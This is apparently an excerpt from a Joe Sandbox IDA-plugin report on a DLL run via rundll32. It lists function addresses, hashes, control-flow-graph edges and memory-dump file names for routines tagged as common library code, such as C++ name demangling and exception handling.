                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2591520935-0
                                                                                                                                                                                                                                                  • Opcode ID: 802e43ab5220ed512d0623585b5c6eee699b76c966b13ec90f4942404d9e4e82
                                                                                                                                                                                                                                                  • Instruction ID: 64d13e85883def1e901923d6c9018b7936bb528f0590fea9e49b5af43c603379
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 802e43ab5220ed512d0623585b5c6eee699b76c966b13ec90f4942404d9e4e82
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20717C72710B0889FBA29B61D8527EC23B4BB4C7C8F44C526BA19677D5EF3A864DC350
                                                                                                                                                                                                                                                  Function 00000001800402A0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                                                                                  • Opcode ID: 1a631cd767aa6af9efa7e5aa469953c2907d5c4779ab4064bd7ad95633586567
                                                                                                                                                                                                                                                  • Instruction ID: 483f6a83d11dcc029adc45c6f3cb0b9be83de0b0cb0aa062e5b1d14df8a2b4d4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a631cd767aa6af9efa7e5aa469953c2907d5c4779ab4064bd7ad95633586567
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D319236204F8486EBA1CF25E8443EE73A4F788798F504126FA8D53B99DF39C659CB00
                                                                                                                                                                                                                                                  Function 0000000180013CD4 Relevance: 58.1, APIs: 4, Strings: 29, Instructions: 382COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 804 180013cd4-180013d05 805 18001429b-1800142ad 804->805 806 180013d0b-180013d29 804->806 809 1800142b0-1800142b3 call 180011f88 805->809 807 180013e44-180013e47 806->807 808 180013d2f 806->808 812 180013e49-180013e6d call 180015478 807->812 813 180013e7e-180013e85 807->813 810 180013e32-180013e3f 808->810 811 180013d35-180013d38 808->811 816 1800142b8-1800142d4 809->816 821 1800141d4-1800141d8 call 1800115cc 810->821 817 180013d3a 811->817 818 180013db0-180013db5 811->818 832 180013e73-180013e79 812->832 833 1800141dd-1800141e1 812->833 819 180013e91-180013e98 813->819 820 180013e87-180013e8a 813->820 825 180013d68-180013d75 817->825 826 180013d3c-180013d3f 817->826 822 180013db7-180013dba 818->822 823 180013e20-180013e2d 818->823 827 180013fa8-180013fab 819->827 828 180013e9e 819->828 820->819 821->833 830 180013df3-180013e1b call 180012050 822->830 831 180013dbc-180013dbf 822->831 823->821 825->821 836 180013d41-180013d44 826->836 837 180013d9e-180013dab 826->837 834 180013fb1 827->834 835 180014128-18001412b 827->835 838 180013ea4-180013ea7 828->838 839 180013f96-180013fa3 828->839 830->833 840 180013dc1-180013dc4 831->840 841 180013ddd-180013dee call 1800115cc 831->841 832->816 850 180014212-180014219 833->850 851 1800141e3-1800141ea 833->851 842 180014116-180014123 834->842 843 180013fb7-180013fba 834->843 845 180014131-180014134 835->845 846 1800141c7 835->846 836->837 844 180013d46-180013d49 836->844 837->821 847 180013ead 838->847 848 180013f4f-180013f52 838->848 839->821 853 180013dc6-180013dc9 840->853 854 180013dd5-180013dd8 840->854 841->830 842->821 855 180014013 843->855 856 180013fbc-180013fbf 843->856 844->837 857 180013d4b-180013d4e 844->857 859 180014136-180014139 845->859 860 18001416f-1800141c5 call 180016f68 call 180011998 call 180011f88 845->860 858 1800141ce 846->858 862 180013eb3-180013eb6 847->862 863 180013f87-180013f91 847->863 848->863 864 180013f54-180013f57 848->864 852 180014220-180014255 call 180011998 call 180011f88 850->852 866 180014202-180014210 851->866 867 1800141ec-1800141f0 851->867 873 180014258-18001425b 852->873 853->854 868 180013dcb-180013dce 853->868 869 180014018-18001402f 854->869 855->869 875 180014001-18001400e 856->875 876 180013fc1-180013fc4 856->876 877 180013d8c-180013d99 857->877 878 180013d50-180013d53 857->878 858->821 879 180014163-18001416d 859->879 880 18001413b-18001413e 859->880 860->833 881 180013f3c-180013f4a call 180011e30 862->881 882 180013ebc-180013ebf 862->882 863->821 870 180013f78-180013f82 864->870 871 180013f59-180013f5c 864->871 866->852 872 1800141f2-1800141fa 867->872 867->873 868->854 885 180013dd0-180013dd3 868->885 899 180014031-180014054 call 1800173ec 869->899 900 180014090-180014093 869->900 870->821 871->870 887 180013f5e-180013f61 871->887 872->873 888 1800141fc-180014200 872->888 890 18001428c-180014299 873->890 891 18001425d-180014287 call 180013408 call 180011f88 call 1800120d0 873->891 875->821 892 180013ff2-180013ffc 876->892 893 180013fc6-180013fc9 876->893 877->821 878->877 894 180013d55-180013d58 878->894 879->821 895 180014154-180014157 880->895 896 180014140-180014143 880->896 881->833 897 180013ec1-180013ec4 882->897 898 180013efa-180013f37 call 180013cd4 call 180011998 882->898 885->812 885->854 907 180013f63-180013f66 887->907 908 180013f6c-180013f73 887->908 888->866 888->873 890->816 891->890 892->821 911 180013fcb-180013fce 893->911 912 180013fe0-180013fed 893->912 913 180013d7a-180013d87 894->913 914 180013d5a-180013d5d 894->914 895->879 896->895 915 180014145-18001414f 896->915 916 180013ec6-180013ec9 897->916 917 180013ee8-180013ef5 897->917 898->809 929 180014081-18001408b 899->929 930 180014056-18001407e call 180012050 899->930 904 180014095-18001409d 900->904 905 1800140fb-180014111 call 1800173ec 900->905 921 1800140e1-1800140e3 904->921 922 18001409f-1800140b5 call 1800115cc 904->922 905->816 907->908 907->915 908->858 911->915 926 180013fd4-180013fdb 911->926 912->821 913->821 914->913 927 180013d5f-180013d62 914->927 915->821 916->917 928 180013ecb-180013ece 916->928 917->821 921->905 934 1800140e5-1800140f6 call 1800115cc 921->934 922->905 946 1800140b7-1800140df call 180012050 922->946 926->858 927->812 927->825 937 180013ed9-180013ee3 928->937 938 180013ed0-180013ed3 928->938 929->816 930->929 934->905 937->821 938->915 938->937 946->905
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                                                                                                                  • API String ID: 2943138195-1482988683
                                                                                                                                                                                                                                                  • Opcode ID: f5b08725d49e3936faf24a31500805328ba618e891ce830165a6676dc23d0718
                                                                                                                                                                                                                                                  • Instruction ID: aba4e943f25002773c1e8b8ff256808fc8ff7469cd32bafab8b6d36a2db658ad
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5b08725d49e3936faf24a31500805328ba618e891ce830165a6676dc23d0718
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E024E72A10F18D8FBA6CB68D8953ED27B1B31D7C4F608119EA091AAA8DF74C74DC740
                                                                                                                                                                                                                                                  Function 00000001800177FC Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1162 1800177fc-180017832 1163 180017835-18001783f 1162->1163 1164 180017845-18001784c 1163->1164 1165 180017c0c-180017c16 1163->1165 1168 18001785b-18001785e 1164->1168 1169 18001784e-180017855 1164->1169 1166 180017c18-180017c1b 1165->1166 1167 180017c2a-180017c2d 1165->1167 1170 180017c93-180017cb2 1166->1170 1171 180017c1d-180017c28 1166->1171 1172 180017c3e-180017c90 call 180011f5c call 180011f88 1167->1172 1173 180017c2f-180017c3c call 180011e30 1167->1173 1174 1800178db-1800178e5 1168->1174 1175 180017860-1800178a2 call 180011998 call 180011f88 1168->1175 1169->1168 1169->1170 1171->1170 1172->1170 1173->1170 1177 180017bd9-180017be7 call 18001994c 1174->1177 1178 1800178eb-1800178fc 1174->1178 1175->1174 1200 1800178a4-1800178d8 call 180013408 call 180011f88 1175->1200 1197 180017beb-180017bf1 call 180011f88 1177->1197 1182 180017902-180017905 1178->1182 1183 180017bb4-180017bd7 call 18001994c 1178->1183 1187 180017b3b-180017ba7 call 1800118e8 call 180011998 call 180011f88 1182->1187 1188 18001790b-18001790e 1182->1188 1183->1197 1213 180017c02-180017c06 1187->1213 1237 180017ba9-180017bb2 call 180012280 1187->1237 1193 180017914-180017917 1188->1193 1194 180017a89-180017a90 1188->1194 1193->1187 1201 18001791d-180017920 1193->1201 1202 180017a92-180017a96 1194->1202 1203 180017aea-180017b36 call 180014fcc call 180013408 call 180011f88 call 180011fb4 1194->1203 1212 180017bf6-180017bff 1197->1212 1200->1174 1209 180017a44-180017a84 call 18001994c call 180011fb4 call 180011f88 1201->1209 1210 180017926-180017929 1201->1210 1202->1203 1211 180017a98-180017ad8 call 180016498 call 180011f88 1202->1211 1203->1197 1209->1212 1218 18001792b-18001793b call 18001623c 1210->1218 1219 180017940-180017953 1210->1219 1211->1213 1242 180017ade-180017ae5 1211->1242 1212->1213 1213->1163 1213->1165 1218->1197 1221 180017958-18001796d call 18001994c 1219->1221 1240 1800179c9-1800179d3 1221->1240 1241 18001796f-180017972 1221->1241 1237->1213 1249 1800179d6-1800179dc 1240->1249 1246 180017974-1800179bb call 180011f5c call 180011f88 1241->1246 1247 1800179bd-1800179c7 1241->1247 1242->1213 1246->1249 1247->1249 1253 180017a34-180017a3f 1249->1253 1254 1800179de-1800179e8 1249->1254 1253->1213 1254->1221 1257 1800179ee-180017a2f call 180013408 call 180011f88 call 180011fb4 1254->1257 1257->1242
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                                                                                                  • String ID: `anonymous namespace'
                                                                                                                                                                                                                                                  • API String ID: 3863519203-3062148218
                                                                                                                                                                                                                                                  • Opcode ID: 99c0d059bb14feceadd0ebac364fdec140f15412be5d4b7962f4a11c550691ce
                                                                                                                                                                                                                                                  • Instruction ID: 780ad3a83c53e58fc5f4bcda82df12fb3de2ceedc09e18eee4d15cf768c518c0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99c0d059bb14feceadd0ebac364fdec140f15412be5d4b7962f4a11c550691ce
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2E14872604B8899EBA28F64E8803DD77B1F349788F908115FA8D17B96DF38C659C740
                                                                                                                                                                                                                                                  Function 0000000180018768 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 359COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1587 180018768-1800187a3 1588 1800187a5-1800187a8 1587->1588 1589 1800187af-1800187b4 1587->1589 1588->1589 1590 1800187ba 1589->1590 1591 18001891e-180018921 1589->1591 1592 180018984-1800189a8 call 180013408 1590->1592 1593 1800187c0-1800187c3 1590->1593 1594 180018927 1591->1594 1595 180018b3f-180018b44 1591->1595 1623 1800189b4-1800189cd call 180014fcc call 1800120d0 1592->1623 1624 1800189aa-1800189ad 1592->1624 1596 1800188b7-1800188bc 1593->1596 1597 1800187c9 1593->1597 1599 180018b21-180018b33 call 1800152b4 1594->1599 1600 18001892d-180018932 1594->1600 1601 180018b46-180018b49 1595->1601 1602 180018b5f-180018b63 1595->1602 1605 180018911-180018919 call 180019394 1596->1605 1606 1800188be-1800188c1 1596->1606 1603 1800188aa-1800188b2 call 1800162a0 1597->1603 1604 1800187cf-1800187d1 1597->1604 1599->1595 1600->1592 1610 180018934-180018937 1600->1610 1611 180018b99-180018bb0 call 180017df8 1601->1611 1612 180018b4b-180018b4e 1601->1612 1607 180018b67 1602->1607 1620 180018b6a-180018b92 call 18005bf80 1603->1620 1616 180018897-1800188a5 1604->1616 1617 1800187d7-1800187da 1604->1617 1605->1620 1618 180018904-18001890c call 180016e34 1606->1618 1619 1800188c3-1800188c6 1606->1619 1607->1620 1610->1592 1626 180018939-18001893c 1610->1626 1649 180018bb2-180018bc7 1611->1649 1650 180018bca-180018be5 call 18003f980 1611->1650 1613 180018b93-180018b97 1612->1613 1614 180018b50-180018b53 1612->1614 1613->1607 1614->1611 1634 180018b55-180018b58 1614->1634 1616->1620 1628 18001888a-180018892 call 180017df8 1617->1628 1629 1800187e0-1800187e3 1617->1629 1618->1620 1630 1800188f5-1800188ff call 180015ae0 1619->1630 1631 1800188c8-1800188cb 1619->1631 1643 180018a16-180018a19 1623->1643 1693 1800189cf-1800189d3 1623->1693 1624->1623 1632 1800189af-1800189b2 1624->1632 1626->1592 1639 18001893e-180018941 1626->1639 1628->1620 1640 1800187e5-1800187e8 1629->1640 1641 18001881f-180018822 1629->1641 1630->1620 1631->1630 1642 1800188cd-1800188d0 1631->1642 1632->1623 1632->1643 1634->1611 1646 180018b5a-180018b5d 1634->1646 1639->1592 1652 180018943-180018946 1639->1652 1654 180018812-18001881a call 180019528 1640->1654 1655 1800187ea-1800187ed 1640->1655 1660 180018824-180018855 call 180011998 1641->1660 1661 18001885a-180018885 call 180013408 call 180014fcc call 180011f88 1641->1661 1656 1800188d2-1800188d5 1642->1656 1657 1800188e8-1800188f0 call 180013814 1642->1657 1662 180018a99-180018ab2 call 180017df8 call 1800120d0 1643->1662 1663 180018a1b-180018a1e 1643->1663 1646->1602 1646->1611 1649->1650 1684 180018c16-180018c44 call 18001a184 call 180011240 1650->1684 1685 180018be7-180018bf1 1650->1685 1665 180018964-180018971 call 180018cb8 1652->1665 1666 180018948-18001894b 1652->1666 1654->1620 1670 180018805-18001880d call 1800181bc 1655->1670 1671 1800187ef-1800187f2 1655->1671 1656->1602 1672 1800188db-1800188e3 call 180014fcc 1656->1672 1657->1620 1660->1620 1661->1620 1683 180018afb-180018b0b call 180017df8 call 1800120d0 1662->1683 1727 180018ab4-180018ab8 1662->1727 1680 180018a37-180018a50 call 180017df8 call 1800120d0 1663->1680 1681 180018a20-180018a23 1663->1681 1665->1602 1701 180018977-18001897f call 180018768 1665->1701 1666->1602 1667 180018951-180018958 1666->1667 1667->1665 1670->1620 1671->1602 1688 1800187f8-180018800 call 1800134b4 1671->1688 1672->1620 1680->1662 1731 180018a52-180018a56 1680->1731 1682 180018a29-180018a2c 1681->1682 1681->1683 1682->1662 1697 180018a2e-180018a31 1682->1697 1710 180018b10-180018b1f call 180011fb4 1683->1710 1742 180018c46-180018c49 1684->1742 1743 180018cad-180018cb4 1684->1743 1685->1684 1699 180018bf3-180018c01 1685->1699 1688->1620 1706 1800189d5-1800189e8 call 180013408 1693->1706 1707 1800189ea-1800189fc call 180016334 1693->1707 1697->1680 1697->1710 1699->1684 1730 180018c03-180018c11 call 1800112f4 1699->1730 1701->1620 1706->1643 1736 180018a07 1707->1736 1737 1800189fe-180018a05 1707->1737 1710->1620 1734 180018aba-180018acd call 180013408 1727->1734 1735 180018acf-180018ae1 call 180016334 1727->1735 1730->1620 1740 180018a58-180018a6b call 180013408 1731->1740 1741 180018a6d-180018a7f call 180016334 1731->1741 1734->1683 1760 180018ae3-180018aea 1735->1760 1761 180018aec 1735->1761 1745 180018a0a-180018a11 call 1800114a0 1736->1745 1737->1745 1740->1662 1763 180018a81-180018a88 1741->1763 1764 180018a8a 1741->1764 1742->1743 1750 180018c4b-180018c4e 1742->1750 1752 180018ca4-180018cab 1743->1752 1745->1643 1757 180018c9d 1750->1757 1758 180018c50-180018c53 1750->1758 1759 180018c67-180018c94 call 180011998 call 180011f88 1752->1759 1757->1752 1758->1602 1765 180018c59-180018c60 1758->1765 1759->1757 1762 180018aef-180018af6 call 1800114a0 1760->1762 1761->1762 1762->1683 1768 180018a8d-180018a94 call 1800114a0 1763->1768 1764->1768 1765->1759 1768->1662
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameName::$Name::operator+swprintf
                                                                                                                                                                                                                                                  • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                                                                                                                                                                  • API String ID: 130963256-2441609178
                                                                                                                                                                                                                                                  • Opcode ID: 1b7cca95e2e488a3e0c80d76d27b89714392a22bae90429b9d429f6739e61c38
                                                                                                                                                                                                                                                  • Instruction ID: 2de753167b07bd77337a4f86cbd4a1a1ff146968b76736af4f3f81d3ad70022d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b7cca95e2e488a3e0c80d76d27b89714392a22bae90429b9d429f6739e61c38
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FF1AF72604E1889FBD79BA4C9953FC27A1AF0D7C4F54C116FA0A27A96DF38874DA301
                                                                                                                                                                                                                                                  Function 0000000180015C48 Relevance: 19.9, APIs: 13, Instructions: 361COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1773 180015c48-180015c7e 1774 180015ca3-180015ca9 1773->1774 1775 180015c80-180015c9e call 180011f88 1773->1775 1777 180015cb4-180015cc7 1774->1777 1778 180015cab-180015cae 1774->1778 1783 180016158-18001617b 1775->1783 1781 180015cc9-180015ccc 1777->1781 1782 180015ceb-180015cee 1777->1782 1778->1777 1780 18001614d-180016151 1778->1780 1784 180016155 1780->1784 1781->1775 1785 180015cce-180015ce4 1781->1785 1782->1780 1786 180015cf4-180015cf7 1782->1786 1784->1783 1785->1786 1787 180015ce6-180015ce9 1785->1787 1786->1780 1788 180015cfd-180015d19 1786->1788 1787->1786 1789 180015e6e-180015e78 1788->1789 1790 180015d1f-180015d29 1788->1790 1791 180015e7e-180015e8e 1789->1791 1792 180015f3f 1789->1792 1793 180015dfd-180015e00 1790->1793 1794 180015d2f-180015d7f call 180011998 call 180011f88 1790->1794 1795 180015e94-180015eda call 180013bdc call 180013408 call 180011f88 * 2 1791->1795 1796 180015f1d-180015f27 call 180013bdc 1791->1796 1798 180015f42-180015f52 1792->1798 1799 180015e07-180015e0b 1793->1799 1820 180015d81-180015dcb call 1800177fc call 180013408 call 180011f88 * 2 1794->1820 1821 180015dcd-180015ded call 180011f88 1794->1821 1837 180015f3c 1795->1837 1796->1798 1818 180015f29-180015f2d 1796->1818 1805 180015f54-180015f76 call 180014414 call 180011f88 1798->1805 1806 180015f78-180015f81 call 180014414 1798->1806 1800 180015e11-180015e13 1799->1800 1801 180015f08-180015f14 1799->1801 1800->1780 1808 180015e19-180015e41 1800->1808 1801->1796 1826 180015f99-180015f9c 1805->1826 1825 180015f83-180015f87 1806->1825 1806->1826 1815 180015e47-180015e68 call 180014534 1808->1815 1816 180015edc-180015ef9 call 180014534 1808->1816 1842 180015e6b 1815->1842 1816->1789 1841 180015eff-180015f03 1816->1841 1818->1798 1827 180015f2f-180015f38 1818->1827 1849 180015df1-180015dfb 1820->1849 1821->1849 1825->1826 1833 180015f89-180015f96 1825->1833 1834 180015f9e-180015fdc call 180013408 call 180011f88 call 180011fb4 1826->1834 1835 180015fdf-180015ff6 call 180016334 1826->1835 1827->1837 1833->1826 1834->1835 1852 180016001 1835->1852 1853 180015ff8-180015fff 1835->1853 1837->1792 1841->1842 1842->1789 1849->1799 1856 180016004-180016068 call 1800177c8 call 1800136c8 call 180013408 call 180011f88 call 180011fb4 call 1800120d0 1852->1856 1853->1856 1876 180016082-18001608e 1856->1876 1877 18001606a-18001606d 1856->1877 1879 1800160a3-1800160ac call 1800175ec 1876->1879 1880 180016090-1800160a1 call 1800175ec call 1800120d0 1876->1880 1877->1876 1878 18001606f-18001607c call 1800120d0 1877->1878 1878->1876 1887 1800160c7-1800160ed call 1800163d8 call 1800120d0 1879->1887 1888 1800160ae-1800160b2 1879->1888 1880->1887 1896 180016121-18001612a call 180018e60 1887->1896 1897 1800160ef-1800160fb call 180018e60 call 1800120d0 1887->1897 1888->1887 1890 1800160b4-1800160c4 1888->1890 1890->1887 1902 18001612c-180016130 1896->1902 1903 180016100-180016104 1896->1903 1897->1903 1902->1903 1905 180016132-180016141 1902->1905 1906 180016107-18001610a 1903->1906 1905->1906 1907 180016143-18001614b 1906->1907 1908 18001610c-18001611f 1906->1908 1907->1784 1908->1783
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2943138195-0
                                                                                                                                                                                                                                                  • Opcode ID: d75365040a848f4e962de2583f4bdf6dcab0124c40e345c2fd97b6724785b456
                                                                                                                                                                                                                                                  • Instruction ID: 59aeec8a3cdcdbcd6b95e25ddd39330fc951fab43e09b50c7be90718a66a7329
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d75365040a848f4e962de2583f4bdf6dcab0124c40e345c2fd97b6724785b456
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCF13D76B04A889EEB52DFA4E4903EC77B1E30978CF448016FA496BA96DF34C65DC340
                                                                                                                                                                                                                                                  Function 0000000180013980 Relevance: 16.7, APIs: 11, Instructions: 158COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
